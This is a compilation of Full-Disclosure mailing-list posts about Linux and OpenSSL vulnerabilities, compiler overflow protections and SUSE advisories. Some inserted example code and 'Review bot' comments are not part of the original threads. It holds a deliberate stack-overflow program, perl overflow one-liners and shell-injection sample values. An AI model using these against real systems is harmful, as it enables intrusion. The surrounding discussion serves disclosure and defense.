[Full-disclosure] Pre-Auth remote crash in NanoSSH on Avaya Ethernet Routing switch (ERS) 5698 and 5698-PoE

2013-07-17 Thread Marcus Meissner
Hi,

Various openssh 6.2p1 users, including our administrators, stumbled over
this nice bug in the nanossh server during the pre-authentication phase
within nanossh (https://www.mocana.com/for-device-manufacturers/nanossh/).

Bug at openssh bugzilla:
https://bugzilla.mindrot.org/show_bug.cgi?id=2116
http://www.gossamer-threads.com/lists/openssh/bugs/55880  

Basically, if the HMAC list is unexpectedly long (1), the remote nanossh
daemon will crash. Unclear if code execution, but well, I would not bet against
it.

Also unclear if more than the listed Nortel switches are affected, or all
nanossh deployers, but probably yes.

Ciao, Marcus

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] how i stopped worrying and loved the backdoor

2012-08-19 Thread Marcus Meissner
On Sat, Aug 18, 2012 at 04:00:20PM -0700, coderman wrote:
 Dan just released DakaRand
   http://dankaminsky.com/2012/08/15/dakarand/
 
 src http://s3.amazonaws.com/dmk/dakarand-1.0.tgz
 
 while admitting that Matt Blaze has essentially disowned this
 approach, and seems to be honestly horrified that I’m revisiting it
 and Let me be the first to say, I don’t know that this works. this
 mode would greatly reduce, maybe eliminate the incidence of key
 duplication in large sample sets (e.g. visibly poor entropy for key
 generation)
 
 the weak keys[0] authors clearly posit that they have detected merely
 the most obvious and readily accessible poor keys, and that further
 attacks against generator state could yield even more vulnerable
 pairs... you have been warned :P
 
 the solution is adding hw entropy[1][2] to the mix. anything less is
 doing it wrong!
 
 if you don't have hw entropy, adding dakarand is better than not.

Lots of people are using haveged already, it operates on a similar principle.

http://www.issihosts.com/haveged/

Ciao, Marcus


Re: [Full-disclosure] The story of the Linux kernel 3.x...

2012-05-16 Thread Marcus Meissner
On Wed, May 16, 2012 at 07:54:13PM +0200, Nicolas Surribas wrote:
 I can't reproduce with current openSUSE 12.1...
 
 sh-4.2$ uname -rop
 3.1.10-1.9-desktop x86_64 GNU/Linux
 sh-4.2$ lsb-release -ri
 Distributor ID: SUSE LINUX
 Release:12.1
 sh-4.2$ cat /proc/self/maps | grep vdso
 7fff48b58000-7fff48b59000 r-xp  00:00 0  
 [vdso]
 sh-4.2$ cat /proc/self/maps | grep vdso
 7fffabbff000-7fffabc0 r-xp  00:00 0  
 [vdso]
 sh-4.2$ cat /proc/sys/kernel/randomize_va_space
 1

x86_64 is a bit different.

openSUSE 12.1 x86 (32bit) still uses COMPAT_VDSO, as it was never really clear
what kind of applications would break if disabled.

The next openSUSE, openSUSE 12.2, will have the 32bit VDSO randomized.

Also, randomize_va_space will be 2 (heap randomization too for PIE binaries).

Ciao, Marcus



Re: [Full-disclosure] The story of the Linux kernel 3.x...

2012-05-16 Thread Marcus Meissner
On Wed, May 16, 2012 at 10:23:19PM +0200, Tavis Ormandy wrote:
 Tavis Ormandy tav...@cmpxchg8b.com wrote:
 
  Adam Zabrocki p...@pi3.com.pl wrote:
  
   Hi Tavis,
   
   Don't know why you don't believe me :) Anyway:
  
  I don't believe any distribution stock kernel enabled it, because this is
  just too simple to get wrong. But if they have, we need to find out who
  enabled it so you can file bugs in the appropriate place.
  
 
 Looks like I'm wrong, SuSE do enable it on x86.
 
 How disappointing, looks like my faith in them was misplaced. You should
 definitely complain if you're a Novell customer, that is just ridiculous.

As written in the other e-mail, it is basically fighting against people
who think that disabling it will break things.

Nobody can actually point to an application that breaks.

That said, openSUSE 12.2 will have it disabled.

Disabling it for older products ... see above. :/

Ciao, Marcus



Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools

2012-03-13 Thread Marcus Meissner
Hi,

How is this different from writing a fork bomb?

Ciao, Marcus

On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote:
 [ Description ]
 
 An integer overflow was found in the iputils/ping_common.c main_loop() function
 which could lead to excessive CPU usage when triggered (could lead to DoS). This
 means that both ping and ping6 are vulnerable.
 
 
 [ Proof-Of-Concept ]
 
 Specify a big interval (-i option) for the ping/ping6 tool:
 {{{
 $ ping -i 3600 google.com
 PING google.com (173.194.66.102) 56(84) bytes of data.
 64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50 
 time=11.4 ms
 [...]
 }}}
 
 And check your CPU usage (top, htop, etc.)
 
 
 [ Explanation ]
 
 Here, ping will loop in main_loop() in this section of code:
 {{{
 /* from iputils-s20101006 source */
 /* ping_common.c */
 
 546 void main_loop(int icmp_sock, __u8 *packet, int packlen)
 547 {
 [...]
 559 for (;;) {
 [...]
 572 do {
 573 next = pinger();
 574 next = schedule_exit(next);
 575 } while (next <= 0);
 [...]
 588 if ((options & (F_ADAPTIVE|F_FLOOD_POLL)) ||
 next < SCHINT(interval)) {
 [...]
 593 if (1000*next <= 100/(int)HZ) {
 }}}
 
 If the interval parameter (-i) is set, then the condition at L593 will overflow
 (i.e. the value exceeding sizeof(signed integer)), making this statement always
 true for big values (e.g. -i 3600). As a consequence, the ping process will start
 looping actively as long as the condition is true (which could be pretty long).
 
 As far as we have looked, this bug is unlikely to be exploitable besides provoking
 Denial-Of-Service.
 
 
 [ Affected versions ]
 
 Tested on Fedora/Debian/Gentoo Linux systems (2.6.x x86_32 and x86_64) on
 iputils version 20101006. ping6 seems also to be affected since it's relying
 on the same ping_common.c functions.
 
 Since iputils is not maintained any longer
 (http://www.spinics.net/lists/netdev/msg191346.html), the patch must be
 applied from source.
 
 
 [ Patch ]
 Quick'n'dirty patch (full patch in appendix) is to cast the test result as
 long long:
 {{{
 593  if (((long long)1000*next) <= (long long)100/(int)HZ) {
 }}}
 
 
 [ Credits ]
 * Christophe Alladoum (HSC)
 * Romain Coltel (HSC)
 
 
 -- 
 Christophe Alladoum - christophe.allad...@hsc.fr
 Hervé Schauer Consultants - http://www.hsc.fr
 
 

-- 
Working, but not speaking, for the following german company:
SUSE LINUX Products GmbH, HRB 16746 (AG Nuernberg)
Geschaeftsfuehrer: Jeff Hawn, Jennifer Guild, Felix Imendoerffer
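A worked illustration of the overflow the advisory above describes, added here as example code (not from iputils or the advisory's authors): `next_ms` plays the role of `next`, the tick threshold is passed in as a parameter rather than reproducing the `100/(int)HZ` expression from the quoted excerpt, and the wraparound of the 32-bit product is computed by hand so the comparison stays defined behaviour.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Reduce a 64-bit product to the value a wrapping 32-bit signed
 * multiplication would yield. Done explicitly so this is defined
 * behaviour; the real 1000*next with int operands is undefined on
 * overflow, which is exactly why the compiler cannot save you. */
static int32_t wrap32(int64_t v)
{
    int64_t low = (int64_t)((uint64_t)v & 0xffffffffULL);
    if (low >= 0x80000000LL)
        low -= 0x100000000LL;
    return (int32_t)low;
}

/* Does 1000*next_ms leave the range of a 32-bit int at all? */
bool product_overflows(int32_t next_ms)
{
    int64_t p = (int64_t)1000 * next_ms;
    return p > INT32_MAX || p < INT32_MIN;
}

/* The original comparison "1000*next <= tick" evaluated in int. For
 * next_ms >= 2147484 the product wraps negative and the test is true,
 * so ping takes the short-timeout poll branch although the interval
 * is huge, and keeps doing so until the interval really elapses. */
bool poll_check_vulnerable(int32_t next_ms, int32_t tick_us)
{
    return wrap32((int64_t)1000 * next_ms) <= tick_us;
}

/* The patched comparison: widen to long long before multiplying. */
bool poll_check_fixed(int32_t next_ms, int32_t tick_us)
{
    return ((long long)1000 * next_ms) <= (long long)tick_us;
}

int main(void)
{
    const int32_t tick_us = 10000;  /* assumption: one tick at HZ=100 */
    const int32_t cases[] = { 1, 20, 2147483, 2147484, 3600000 };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int32_t n = cases[i];
        printf("next=%8d ms  overflow=%d  vulnerable_polls=%d  fixed_polls=%d\n",
               n, product_overflows(n), poll_check_vulnerable(n, tick_us),
               poll_check_fixed(n, tick_us));
    }
    return 0;
}
```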



Re: [Full-disclosure] [funsec] Trustwave and Mozilla (Resolved)

2012-02-24 Thread Marcus Meissner
On Thu, Feb 23, 2012 at 07:11:53AM -0500, David C Frier wrote:
 On Wed, Feb 22, 2012 at 19:12, Jeffrey Walton noloa...@gmail.com wrote:
  It appears to be official.
 
  Trustwave issued MitM certificates, which is deceptive, unethical, and
  contrary to its agreement for inclusion.
 
  Mozilla just rewarded their violations of trust by continuing their
  inclusion. Apparently, agreements between Mozilla and CAs have no
  veracity as both are more than happy to violate the end user.
 
 This is not the simplistic issue with clear moral blacks and whites
 that you seem to think it is.
 
 Companies need MitM certs to fully implement DLP and protect
 proprietary data - HR info, trade secrets, unpublished financials.
 Without them, SSL-protected external sites are potentially
 back-channels for the leakage of anything someone decides to leak.
 Workers don't understand what the lines are between work-related and
 personal network usage.  Companies would be suicidal to just give up
 on this.
 
 So, what would you propose as an alternative?

That they install their machines with their own CA added to the CA store
and use this internal CA for MitM cert signing.

Ciao, Marcus



Re: [Full-disclosure] Vulnerability in Novell website.

2012-02-13 Thread Marcus Meissner
Hi,

We have escalated this within Novell and the CRS servlet got removed
last week on the day of the report.

Ciao, Marcus

On Mon, Feb 13, 2012 at 04:36:44PM +0100, Team wrote:
   
 
 Hello :-) 
 
 I sent an email stating the problem to the company,
 waited a few days and got no response, so I'm making the vulnerability
 public: 
 
 Scan date: 2-2-2012
 13:33:54
 ===
 |
 Domain: http://www.novell.com/ [1]
 | Server: Apache
 | IP:
 130.57.5.25
 ===
 ...
 
 
 | LFI:

Re: [Full-disclosure] Requesting/Reserving CVE Question

2011-04-29 Thread Marcus Meissner
On Thu, Apr 28, 2011 at 06:42:13PM +0300, Henri Salo wrote:
 On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote:
  Hello all,
  
  First off, if this isn't the place to ask this question, I apologize, and
  feel free to ignore this e-mail.  
  
  I've found a couple vulnerabilities in a web forum/portal/etc. product
  called IP.Board.  I was looking to reserve a CVE number, and I attempted to
  contact the address Mitre lists for reserving one, however, it's been
  nearly a month and I have not received anything back from them.  This is
  the first vulnerability I have found, and have never requested/reserved a
  CVE before, so I am a little unfamiliar with the process (although based
  off of the following website, it looks like all I need to do is send an
  e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
  
  I've sent follow-up e-mails and I've received no response.  My
  question to you all is: how long does this process take?  Is there something
  else that should be done, or someone else the request should be sent to? 
  What's the normal time frame from requesting a CVE number to hearing back
  from them?
  
  Thanks for any help/info/advice.  I appreciate it.
  
  Chris
 
 No luck. With open-source you could have tried:
 http://oss-security.openwall.org/wiki/mailing-lists/oss-security

The oss-security list only handles open-source software, which IP.Board does not
appear to be.

As for Mitre, just resend the e-mail, they usually answer at some point in time.
(They seem to be overworked, so it's not just you.)

A simple e-mail requesting one as explained in obtain_id.html should work.

Ciao, Marcus



Re: [Full-disclosure] ISC DHCP Client [3.0.x to 4.2.x] Arbitrary Command Execution (CVE-2011-0997)

2011-04-06 Thread Marcus Meissner
On Wed, Apr 06, 2011 at 02:01:58PM -0400, Ryan Sears wrote:
 Hey guys,
 
 It was recently discovered (NOT by myself) that the ISC dhclient was 
 vulnerable to certain shell metacharacters in the hostname parameter 
 specified by *any* DHCP server, causing it to potentially run arbitrary 
 commands as root. I haven't seen anything else on it here, so I figured I'd 
 make everyone aware. 
 
 There's only one real phrase that comes to mind = WTF?
 
 https://www.isc.org/software/dhcp/advisories/cve-2011-0997
 
 http://www.h-online.com/security/news/item/DHCP-client-allows-shell-command-injection-1222805.html

By itself it is not a DHCP client issue; just the fact that DHCP clients
let DHCP-daemon-controlled hostnames through without filtering could in turn
make other programs, e.g. X.Org, execute code when evaluating the hostname
unquoted.

X.Org was also fixed yesterday: http://lwn.net/Articles/437018/
(It passed -Dsomething=$hostname unquoted to an xrdb call via system().)

(discovered by Sebastian Krahmer of SUSE Security.)

Ciao, Marcus
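The failure mode described in this thread, as an added example (not code from dhclient or X.Org): a DHCP-supplied hostname spliced into a command line for system() is parsed by the shell, whereas validating the value against the hostname alphabet and then passing it as one argv element keeps a shell out of the path entirely. Function names, the `-DHOST` definition and the sample hostnames are my own constructions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only the RFC 1123 hostname alphabet: labels of letters, digits
 * and '-', joined by '.', no empty label, no label starting or ending
 * with '-', label <= 63 and total <= 253 bytes. A DHCP client that applies
 * this before exporting the value never hands a shell metacharacter on. */
bool hostname_is_valid(const char *h)
{
    size_t len = strlen(h), label = 0;
    if (len == 0 || len > 253) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)h[i];
        if (c == '.') {
            if (label == 0 || h[i - 1] == '-') return false;
            label = 0;
            continue;
        }
        if (!isalnum(c) && c != '-') return false;
        if (c == '-' && label == 0) return false;
        if (++label > 63) return false;
    }
    return label != 0 && h[len - 1] != '-';
}

/* The shape of the bug: the hostname becomes part of a string that a shell
 * will parse, so every metacharacter in it is interpreted, not passed on.
 * Returns the length of the line that would have been handed to system(). */
int build_shell_command_unsafe(char *out, size_t n, const char *hostname)
{
    return snprintf(out, n, "xrdb -DHOST=%s -merge ~/.Xresources", hostname);
}

/* Safer shape: validate, then exec the program directly with an argv array.
 * No shell runs, and the definition is one argument whatever it contains.
 * Returns the child's exit status, or -1 if the hostname was rejected or
 * the child could not be started. Assumes `prog` is found on PATH. */
int run_with_hostname_arg(const char *prog, const char *hostname)
{
    char def[270];
    if (!hostname_is_valid(hostname)) return -1;
    snprintf(def, sizeof def, "-DHOST=%s", hostname);
    char *const argv[] = { (char *)prog, def, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(prog, argv);
        _exit(127);                     /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed samples: a normal hostname and one carrying shell syntax */
    const char *samples[] = { "ws-12.example.net", "ws;echo injected" };
    char cmd[512];
    for (int i = 0; i < 2; i++) {
        build_shell_command_unsafe(cmd, sizeof cmd, samples[i]);
        printf("valid=%d  shell would see: %s\n",
               hostname_is_valid(samples[i]), cmd);
    }
    return 0;
}
```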



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Marcus Meissner
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
 
   Anyone tested this in sandbox yet?
 
 00:37 linups:../expl/kernel  cat /etc/*release*
 openSUSE 11.3 (i586)
 VERSION = 11.3
 00:37 linups:../expl/kernel  uname -r
 2.6.34.4-0.1-desktop
 00:37 linups:../expl/kernel  gcc _2.6.37.local.c -o test
 00:37 linups:../expl/kernel  ./test
 [*] Failed to open file descriptors.

openSUSE 11.2 and 11.3 do not have ECONET compiled,
openSUSE 11.1 has ECONET, but not the 0 ptr deref issue.

The CVE-2010-4258 problem is however in all openSUSEs.

Temporary workaround (for all distributions, not just openSUSE):
echo 1 > /proc/sys/kernel/panic_on_oops
This will now panic the machine instead of making it exploitable.

Ciao, Marcus



Re: [Full-disclosure] Linux Kernel CIFS Vulnerability

2009-04-10 Thread Marcus Meissner
On Thu, Apr 09, 2009 at 03:07:40PM +0200, Andreas Bogk wrote:
 Dear list,
 
 as discovered by Felix von Leitner (http://blog.fefe.de/?ts=b72905a8), 
 Linux kernel patch 2.6.29.1 contains:
 
 --- a/fs/cifs/connect.c
 +++ b/fs/cifs/connect.c
 @@ -3667,7 +3667,7 @@ CIFSTCon(unsigned int xid, struct cifsSesInfo *ses,
 BCC(smb_buffer_response)) {
 kfree(tcon-nativeFileSystem);
 tcon-nativeFileSystem =
 -   kzalloc(length + 2, GFP_KERNEL);
 +   kzalloc(2*(length + 1), GFP_KERNEL);
 if (tcon-nativeFileSystem)
 cifs_strfromUCS_le(
 tcon-nativeFileSystem,
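Review bot: the size change on the kzalloc line is the whole fix and deserves a comment in the code: nativeFileSystem is filled by cifs_strfromUCS_le from a UCS-2 string of `length` code units, so the buffer has to hold 2*(length + 1) bytes (two per character plus a two-byte terminator), while the old `length + 2` covered only about half of what the conversion writes when `length` comes from the server. A one-line comment above the kzalloc explaining the factor of two would stop a later cleanup from "simplifying" it back, and the kfree/kzalloc pair would also read better with a note that the length was already bounded against BCC(smb_buffer_response) in the condition above.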
 
 fixing a remotely exploitable buffer overflow vulnerability in the CIFS 
 protocol.

assuming a malicious server.

 Neither the Linux kernel team, the CIFS maintainers nor any of the commercial 
 Linux distributors bothered to send out an advisory.
 I'm at loss for words other than irresponsible, arrogant assholes.  Linux 
 2009 == Microsoft 2002.

The correct wording is "no advisory was released yet."

The issue is being worked on already, see the CIFS mailing list etc, thread
starts here:
http://lists.samba.org/archive/linux-cifs-client/2009-April/004322.html

Updates will be published when ready.

Ciao, Marcus



Re: [Full-disclosure] Linux Kernel CIFS Vulnerability

2009-04-10 Thread Marcus Meissner
On Fri, Apr 10, 2009 at 01:26:43PM +0200, Thierry Zoller wrote:
 
 The correct wording is "no advisory was released yet."
 An exception to the rule? The question is why? If fefe wouldn't
 have pointed it out there would have been no advisory,
 like the 100 other silently fixed security bugs that even
 those that backport don't catch.
 
 There is a clear statement from the Kernelhacker groups on this
 situation, and it is *not* positive, so why make it look like
 those that complain just do it at the wrong point in time.


 again see :
 http://lwn.net/Articles/285438/
 http://lwn.net/Articles/286263/
 http://lwn.net/Articles/287339/
 http://lwn.net/Articles/288473/
 
 and hundreds of others.

I think we have brought this up to the kernel guys often already
without much effect ...  and I am aware of above posts.

This is Opensource, if the original authors don't provide security
guidance, someone else can easily step up and do it, like Brad, or Fefe,
or whoever else.

Even we as Linux distributors should probably set some people up to study the
.stable releases for such things.

Ciao, Marcus



Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-16 Thread Marcus Meissner
On Mon, Feb 16, 2009 at 09:00:33AM -0500, ArcSighter Elite wrote:
 James Matthews wrote:
  I would recommend doing the following things.
  
  1. Ask on the Ubuntu GCC list what protection is implemented. (Or just look
  at the source)
  2. Use GCC to see where the execution is being redirected and so you can
  have a better visual of whats going on.
  3. Are you sure the stack is executable?

__fortify_fail is caused by the lightweight buffer overflow checking,
enabled by the -D_FORTIFY_SOURCE=2 compile-time flag.

Ciao, Marcus



Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread Marcus Meissner
On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
 I came across a problem that I am sure many security researchers have seen
 before:
 
 ja...@uboo:~$ cat bof.c
 #include <stdio.h>
 #include <string.h>
 
 int main()
 {
     /* 512-byte stack buffer, deliberately overrun by 16 bytes below */
     char buf[512];
 
     memset(buf, 'A', 528);
 
     return 0;
 }
 ja...@uboo:~$
 
 ja...@uboo:~$ ./bof
 *** stack smashing detected ***: ./bof terminated
 === Backtrace: =
 /lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
 ja...@uboo:~$
 
 I have googled my brains out for a solution, but all I have gathered is that
 my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
 return address it also overwrites the canary's value, and triggers a stop in
 the program. I've disassembled it and anybody who can help me probably
 doesn't need me to explain much more, but I would like to know a way to get
 this. There seems to be some people on this list who may know something on
 how to exploit on *nix systems with this protection enabled.
 
 I do not want to just disable the protection and exploit it normally, I want

Perhaps you should learn first exactly _what_ caught your buffer overflow.

Hint: It was not SSP aka -fstack-protector.

Ciao, Marcus



Re: [Full-disclosure] rPSA-2007-0212-1 util-linux

2007-10-12 Thread Marcus Meissner
On Fri, Oct 12, 2007 at 05:02:48AM -0700, Andrew Farmer wrote:
 On 12 Oct 07, at 01:34, yearsilent wrote:
  could anybody explain this bug?
 
I saw the git diff:
 
 
-   setuid(getuid());
-   setgid(getgid());
+   if(setgid(getgid())  0)
+   die(EX_FAIL, _(umount:  
  cannot set group id: %s), strerror(errno));
+
+   if(setuid(getuid())  0)
+   die(EX_FAIL, _(umount:  
  cannot set user id: %s), strerror(errno));
+
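Review bot: two independent fixes are folded into this hunk and the commit message should name both. First, the return values are now checked, so a failing setgid()/setuid() aborts through die() instead of letting umount continue with root privileges. Second, the order is reversed to drop the group before the user; that matters because once setuid() to the unprivileged user has succeeded the process can no longer change its gid, so the old sequence `setuid(getuid()); setgid(getgid());` could leave a privileged gid in place. Since the message passes strerror(errno) alongside the `_()` lookup, it would also be worth confirming that nothing evaluated between the failing call and die() disturbs errno.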
 
 
  not only root can do mount? what condition could cause setuid to
  fail?
 
 setuid() fails if the operation would create more processes owned by
 the target user than the number specified by that user's process-count
 limit.

Please also look closer and see the switch of the order of the setuid()
and setgid() calls to the correct order.

Ciao, Marcus



Re: [Full-disclosure] Palimm Palimmm

2007-05-31 Thread Marcus Meissner
On Thu, May 31, 2007 at 06:07:30PM +0200, Thierry Zoller wrote:
 5DFFC7C3DCFBCED5CEDD48F216936CF9
 9B704583D6E5056E67C959B5CCEE2F548D3C70F3

This list is not called SHA1- or MD5-disclosure, it is called
full-disclosure.

Tell us the real thing or be silent.

Ciao, Marcus



Re: [Full-disclosure] ShortNotes : Stack Smashing with GCC4

2007-04-20 Thread Marcus Meissner
 The classic example (Gera's Law): 
 
[File : abo1.c ]

After fixing your code (adding a missing #include <string.h>)

 $ gcc -o abo1 abo1.c

Which is just not how to compile your code. 
If you pass the right options:

$ gcc -O2 -D_FORTIFY_SOURCE=2 xx.c -o xx
$ ./xx `perl -e "print 'a' x 1024;"`
*** buffer overflow detected ***: ./xx terminated
=== Backtrace: =
/lib/power4/libc.so.6(__chk_fail+0x68)[0xff7db68]
/lib/power4/libc.so.6(__strcpy_chk+0x60)[0xff7c820]
./xx[0x156c]
/lib/power4/libc.so.6[0xfea3f70]
/lib/power4/libc.so.6[0xfea41cc]
...


gcc -O2 -fstack-protector xx.c -o xx
./xx `perl -e "print 'a' x 1024;"`
Input : 
aa
 aa
*** stack smashing detected ***: ./xx terminated


Perhaps you should read the manpages of the compiler first to find the
correct options to enable.

Ciao, Marcus



Re: [Full-disclosure] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability

2007-03-15 Thread Marcus Meissner
On Thu, Mar 15, 2007 at 02:16:41PM +0200, Ismail Dönmez wrote:
 On Thursday 15 March 2007 04:26:29 James Matthews wrote:
  and you would think some bugs we got rid of in open source software!
 
 str{cpy,cat,...} which don't take a size attribute should be removed from 
 standard libc, I don't see why people still insist on using these insecure 
 variants.

Thanks to _FORTIFY_SOURCE strcpy and strcat to fixed size buffers are
at least protected now.

I however fail to see two things:
- is minigzip included anywhere?

- If you can exploit it by passing stuff on the commandline, I have a
  much simpler exploit for you too:

minigzip /dev/null; echo 0wN3d\!

Ciao, Marcus



Re: [Full-disclosure] month of PHP bugs, secondary message?

2007-03-04 Thread Marcus Meissner
On Sun, Mar 04, 2007 at 05:56:09AM -0600, Gadi Evron wrote:
 -
 3. Are PHP applications also a target of this initiative?
 
 No they are not. If you want a month of PHP application bugs you can
 subscribe to the bugtraq or full-disclosure mailinglists.
 snip
 -
 
 http://www.php-security.org/

It's been the Month of PHP application bugs for over 2 years now.

Sad enough.

Ciao, Marcus



Re: [Full-disclosure] Fire and forget exploits?

2006-10-20 Thread Marcus Meissner
On Fri, Oct 20, 2006 at 10:09:13AM -0600, Bruce Ediger wrote:
 On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote:
 
   It seems like this kind of exploit is dying out, particularly as
  different flavors of Linux proliferate, each with their own slightly
  different libc and userland; in the Windows world, however, we still
  find universal exploits that work on NT4/2k/XP over a variety of
  service packs.
 
 Doesn't this implicitly support Dan Geer et al's argument about
 software monoculture?
 
 In fact, wouldn't the linux monoculture concept constitute a bit
 of a misnomer?  Each slightly different userland and libc would constitute
 a different flavor, right?
 
 Nevertheless, the received wisdom remains that If linux took over from
 Windows tomorrow, all the hackers would concentrate on linux flaws, and
 we'd be in the same position.

You are also forgetting ASLR as it is getting deployed in most new
Linux systems. This reduces the monoculture aspect.

(Windows is catching up here too.)

Ciao, Marcus



[Full-disclosure] SUSE Security Announcement: openssl security problems (SUSE-SA:2006:058)

2006-09-28 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:openssl
Announcement ID:SUSE-SA:2006:058
Date:   Thu, 28 Sep 2006 18:00:00 +
Affected Products:  Novell Linux Desktop 9
Novell Linux POS 9
Open Enterprise Server
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: remote denial of service
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CVE-2006-2937, CVE-2006-2940, CVE-2006-3738
CVE-2006-4343, VU#547300, VU#386964

Content of This Advisory:
1) Security Vulnerability Resolved:
 several security problems in openssl
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Several security problems were found and fixed in the OpenSSL
   cryptographic library.

   CVE-2006-3738/VU#547300:
   A Google security audit found a buffer overflow condition within the
   SSL_get_shared_ciphers() function which has been fixed.

   CVE-2006-4343/VU#386964:
   The above Google security audit also found that the OpenSSL SSLv2
   client code fails to properly check for NULL which could lead to a
   server program using openssl to crash.

   CVE-2006-2937:
   Fix mishandling of an error condition in parsing of certain invalid
   ASN1 structures, which could result in an infinite loop which consumes
   system memory.

   CVE-2006-2940:
   Certain types of public key can take disproportionate amounts of time
   to process. This could be used by an attacker in a denial of service
   attack to cause the remote side to spend an excessive amount of time
   in computation.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.



[Full-disclosure] SUSE Security Announcement: openssl, mozilla-nss RSA signature evasion (SUSE-SA:2006:055)

2006-09-22 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:openssl,mozilla-nss
Announcement ID:SUSE-SA:2006:055
Date:   Fri, 22 Sep 2006 18:00:00 +
Affected Products:  Novell Linux Desktop 9
Novell Linux POS 9
Open Enterprise Server
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: RSA signature evasion
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CVE-2006-4339, CVE-2006-4340, CVE-2006-4341

Content of This Advisory:
1) Security Vulnerability Resolved:
 RSA signature evasion
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   If an RSA key with exponent 3 is used, it may be possible to forge a
   PKCS #1 signature against implementations that verify the certificate
   without checking for excess data in the RSA exponentiation result of
   the signature.

   This problem affects various SSL implementations. This advisory
   covers the following implementations:

   - OpenSSL (CVE-2006-4339)
   - Mozilla NSS (CVE-2006-4340 and CVE-2006-4341)
 for SUSE Linux 10.0, 10.1 and SUSE Linux Enterprise 10.

   Implementations that are affected and still need to be updated:
   - gnutls in all distributions.
   - Mozilla NSS before SUSE Linux 10.0 and SUSE Linux Enterprise 10.

   The official openssl advisory is here:
   http://www.openssl.org/news/secadv_20060905.txt

   Some details of the actual technical problem can be found here:
   http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html
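   The "excess data" check the advisory refers to, as an added example in C
   (this is not SUSE's, OpenSSL's or NSS's code). After the RSA public-key
   operation, a PKCS #1 v1.5 verifier holds an encoded message EM that must
   have exactly the layout 0x00 || 0x01 || PS (at least eight 0xFF bytes) ||
   0x00 || T, where T is the DER DigestInfo, with the padding and T filling
   the whole EM. The strict function below enforces that; the lax function
   illustrates the flawed class of check, which stops comparing once the
   DigestInfo matches and ignores anything after it. The 64-byte EM size and
   the DigestInfo bytes used by the encoder and the test are constructed
   placeholders, not values from a real key.

```c
/*
 * Added example (not SUSE's, OpenSSL's or NSS's code): strict versus lax
 * checking of a PKCS #1 v1.5 encoded message (EM) after the RSA public-key
 * operation. EM = 0x00 || 0x01 || PS (>= 8 bytes of 0xFF) || 0x00 || T.
 * The DigestInfo T and the EM length used when running this are
 * constructed placeholders.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Build a correctly padded EM into em. Returns 1 on success, 0 if T does
 * not fit with the minimum padding. */
int pkcs1_v15_encode(unsigned char *em, size_t em_len,
                     const unsigned char *t, size_t t_len)
{
    if (em_len < t_len + 11)            /* 0x00 0x01 + 8 PS + 0x00 + T */
        return 0;
    em[0] = 0x00;
    em[1] = 0x01;
    memset(em + 2, 0xFF, em_len - t_len - 3);
    em[em_len - t_len - 1] = 0x00;
    memcpy(em + em_len - t_len, t, t_len);
    return 1;
}

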